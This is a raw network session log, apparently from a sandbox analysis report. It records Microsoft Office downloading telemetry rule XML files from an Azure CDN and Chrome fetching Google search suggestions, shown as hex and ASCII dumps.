27	192.168.2.7	49728	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:30 UTC	192	OUT	GET /rules/rule120632v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:30 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:30 GMT Content-Type: text/xml Content-Length: 471 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT ETag: "0x8DC582BB5815C4C" x-ms-request-id: b1489392-e01e-0099-2a74-2cda8a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165630Z-r159446fcd7tc5j5hC1DFWrhs000000001ug00000000akrc x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:30 UTC	471	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
28	192.168.2.7	49730	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:30 UTC	192	OUT	GET /rules/rule120635v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:30 UTC	491	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:30 GMT Content-Type: text/xml Content-Length: 420 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT ETag: "0x8DC582B9DAE3EC0" x-ms-request-id: 65394723-101e-00a2-80f1-2c9f2e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165630Z-15869dbbcc6lq45jhC1DFW7zwg00000000zg000000003bma x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:30 UTC	420	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O

Session ID	Source IP	Source Port	Destination IP	Destination Port
29	192.168.2.7	49729	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:30 UTC	192	OUT	GET /rules/rule120633v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:30 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:30 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT ETag: "0x8DC582BB32BB5CB" x-ms-request-id: d33f60ae-f01e-0085-74ec-2b88ea000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165630Z-16547b76f7fdf69shC1DFWcpd000000000qg00000000pppy x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:30 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
30	192.168.2.7	49731	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:30 UTC	192	OUT	GET /rules/rule120634v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:30 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:30 GMT Content-Type: text/xml Content-Length: 494 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT ETag: "0x8DC582BB8972972" x-ms-request-id: 2361c5fe-901e-0064-45f6-2ce8a6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165630Z-16547b76f7fp46ndhC1DFW66zg00000000vg00000000kc13 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:30 UTC	494	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
31	192.168.2.7	49727	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:30 UTC	192	OUT	GET /rules/rule120631v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:30 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:30 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B988EBD12" x-ms-request-id: 396bdd21-c01e-0034-5008-2c2af6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165630Z-176bd8f9bc5k68fjhC1DFW9krg00000002cg000000001m38 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:30 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.7	49738	142.250.186.132	443	2324	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:30 UTC	595	OUT	GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlqHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc= Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-02 16:56:31 UTC	1266	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:30 GMT Pragma: no-cache Expires: -1 Cache-Control: no-cache, must-revalidate Content-Type: text/javascript; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-XtwTM79PuuzfouDbh_MlXQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-11-02 16:56:31 UTC	112	IN	Data Raw: 65 36 39 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 62 65 61 75 20 73 68 72 6f 79 65 72 20 61 6e 67 6f 6c 61 20 61 66 72 69 63 61 22 2c 22 68 6f 6c 69 64 61 79 20 63 68 72 69 73 74 6d 61 73 20 64 72 69 6e 6b 73 22 2c 22 74 68 65 20 64 69 70 6c 6f 6d 61 74 20 73 65 61 73 6f 6e 20 32 20 6e 65 74 66 6c 69 78 22 2c 22 70 6f 6b c3 a9 6d 6f 6e Data Ascii: e69)]}'["",["beau shroyer angola africa","holiday christmas drinks","the diplomat season 2 netflix","pokmon
2024-11-02 16:56:31 UTC	1378	IN	Data Raw: 20 70 72 69 73 6d 61 74 69 63 20 65 76 6f 6c 75 74 69 6f 6e 73 22 2c 22 64 61 72 72 79 6e 20 70 65 74 65 72 73 6f 6e 20 62 61 73 6b 65 74 62 61 6c 6c 22 2c 22 68 75 72 72 69 63 61 6e 65 73 20 74 72 6f 70 69 63 61 6c 20 73 74 6f 72 6d 73 22 2c 22 64 69 77 61 6c 69 20 66 65 73 74 69 76 61 6c 22 2c 22 73 74 61 72 62 75 63 6b 73 20 68 6f 6c 69 64 61 79 20 64 72 69 6e 6b 73 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 67 63 32 56 68 63 6d 4e Data Ascii: prismatic evolutions","darryn peterson basketball","hurricanes tropical storms","diwali festival","starbucks holiday drinks"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmN
2024-11-02 16:56:31 UTC	1378	IN	Data Raw: 55 64 43 61 32 70 56 5a 46 64 59 62 31 52 30 4d 6a 4e 34 55 30 74 78 62 6e 6b 33 61 57 4a 4b 55 58 4a 4e 53 6a 5a 4c 63 56 46 50 61 6d 39 6d 55 57 63 35 61 55 31 54 54 54 68 53 56 58 4a 57 54 58 4e 6a 54 55 30 32 52 57 5a 44 57 6d 52 52 64 44 5a 6b 59 30 38 76 63 33 46 61 4e 44 68 79 65 6b 74 73 57 6a 64 33 56 54 6c 5a 56 45 4e 77 4b 31 4a 59 56 6c 64 4a 4f 48 52 53 53 69 39 59 51 6c 6c 79 5a 47 4e 56 52 47 78 70 57 6a 68 52 53 6c 5a 6c 65 58 46 77 4f 54 52 69 4d 32 56 31 63 46 68 6f 59 6e 5a 4e 61 6d 68 79 5a 6c 68 54 59 6b 68 45 62 48 64 75 64 33 42 54 59 30 39 53 54 31 56 69 62 6c 5a 4e 5a 30 4e 32 53 31 5a 30 64 44 4a 56 52 48 4e 4e 52 31 52 59 4d 46 6c 4f 61 6c 64 56 4e 46 42 6f 65 6c 59 76 5a 6b 68 31 53 33 46 77 4e 57 30 77 64 7a 46 46 56 48 51 30 Data Ascii: UdCa2pVZFdYb1R0MjN4U0txbnk3aWJKUXJNSjZLcVFPam9mUWc5aU1TTThSVXJWTXNjTU02RWZDWmRRdDZkY08vc3FaNDhyektsWjd3VTlZVENwK1JYVldJOHRSSi9YQllyZGNVRGxpWjhRSlZleXFwOTRiM2V1cFhoYnZNamhyZlhTYkhEbHdud3BTY09ST1ViblZNZ0N2S1Z0dDJVRHNNR1RYMFlOaldVNFBoelYvZkh1S3FwNW0wdzFFVHQ0
2024-11-02 16:56:31 UTC	828	IN	Data Raw: 6c 64 57 74 74 4b 32 55 34 54 56 5a 57 57 47 35 31 57 58 70 52 52 30 74 71 61 7a 46 32 55 45 35 47 56 6e 6c 70 53 6d 38 78 53 6b 70 4e 5a 30 78 46 51 58 67 33 4d 33 56 4f 65 44 42 5a 51 57 70 45 54 6e 64 49 64 7a 64 4b 54 45 4a 42 53 6d 6c 6d 4f 45 46 55 4e 45 70 74 62 6b 5a 73 53 32 6c 6c 56 58 46 47 4d 54 4a 50 4b 32 74 4c 54 45 78 6d 63 31 4d 78 5a 31 4e 30 62 54 4e 71 56 32 70 77 63 58 70 4f 63 32 70 70 63 6b 74 6b 53 6d 39 33 57 6a 4e 59 56 32 39 50 62 48 64 78 4d 6b 6b 72 4e 53 39 55 51 6c 4e 70 62 6d 6c 44 63 6b 4e 78 63 6b 68 5a 59 6b 46 6b 54 55 39 55 52 6e 4e 57 4e 44 67 77 59 56 4e 5a 64 54 56 42 51 6d 49 77 52 30 34 7a 51 33 56 5a 55 54 41 78 56 6e 68 43 56 56 4e 48 59 56 5a 43 56 6e 64 34 53 47 74 33 63 7a 55 78 59 33 42 6d 62 46 56 46 4f 58 Data Ascii: ldWttK2U4TVZWWG51WXpRR0tqazF2UE5GVnlpSm8xSkpNZ0xFQXg3M3VOeDBZQWpETndIdzdKTEJBSmlmOEFUNEptbkZsS2llVXFGMTJPK2tLTExmc1MxZ1N0bTNqV2pwcXpOc2ppcktkSm93WjNYV29PbHdxMkkrNS9UQlNpbmlDckNxckhZYkFkTU9URnNWNDgwYVNZdTVBQmIwR04zQ3VZUTAxVnhCVVNHYVZCVnd4SGt3czUxY3BmbFVFOX
2024-11-02 16:56:31 UTC	92	IN	Data Raw: 35 36 0d 0a 6e 70 71 4e 48 52 57 55 44 46 36 59 7a 42 4d 51 32 39 7a 54 54 42 66 54 30 30 34 4e 48 64 5a 55 46 4e 54 55 32 74 72 63 30 74 78 63 6b 31 56 65 57 68 4a 54 46 56 72 64 45 74 7a 4e 31 42 56 4d 47 68 4c 54 45 30 31 54 30 78 56 62 45 74 36 54 57 74 43 51 55 52 0d 0a Data Ascii: 56npqNHRWUDF6YzBMQ29zTTBfT004NHdZUFNTU2trc0txck1VeWhJTFVrdEtzN1BVMGhLTE01T0xVbEt6TWtCQUR
2024-11-02 16:56:31 UTC	359	IN	Data Raw: 31 36 30 0d 0a 6b 53 45 52 35 56 58 41 47 63 41 63 5c 75 30 30 33 64 22 2c 22 7a 6c 22 3a 31 30 30 30 32 7d 2c 7b 22 7a 6c 22 3a 31 30 30 30 32 7d 2c 7b 22 7a 6c 22 3a 31 30 30 30 32 7d 2c 7b 22 7a 6c 22 3a 31 30 30 30 32 7d 5d 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 72 65 6c 65 76 61 6e 63 65 22 3a 5b 31 32 35 37 2c 31 32 35 36 2c 31 32 35 35 2c 31 32 35 34 2c 31 32 35 33 2c 31 32 35 32 2c 31 32 35 31 2c 31 32 35 30 5d 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 73 75 62 74 79 70 65 73 22 3a 5b 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c Data Ascii: 160kSER5VXAGcAc\u003d","zl":10002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggestrelevance":[1257,1256,1255,1254,1253,1252,1251,1250],"google:suggestsubtypes":[[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],
2024-11-02 16:56:31 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
33	192.168.2.7	49739	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:31 UTC	192	OUT	GET /rules/rule120636v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:31 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:31 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT ETag: "0x8DC582B9D43097E" x-ms-request-id: de0f478a-601e-0032-7838-2ceebb000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165631Z-176bd8f9bc5hwksrhC1DFWf9wg00000002d00000000038an x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:31 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
34	192.168.2.7	49742	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:31 UTC	192	OUT	GET /rules/rule120638v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:31 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:31 GMT Content-Type: text/xml Content-Length: 486 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT ETag: "0x8DC582B92FCB436" x-ms-request-id: d142ed2e-801e-0067-6d10-2cfe30000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165631Z-176bd8f9bc5pqws8hC1DFW15kc0000000220000000007b5x x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:31 UTC	486	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
35	192.168.2.7	49740	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:31 UTC	192	OUT	GET /rules/rule120637v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:31 UTC	491	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:31 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT ETag: "0x8DC582BA909FA21" x-ms-request-id: ceff4d6f-101e-007a-10c7-2c047e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165631Z-16547b76f7fxsvjdhC1DFWprrs00000000r000000000mua1 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
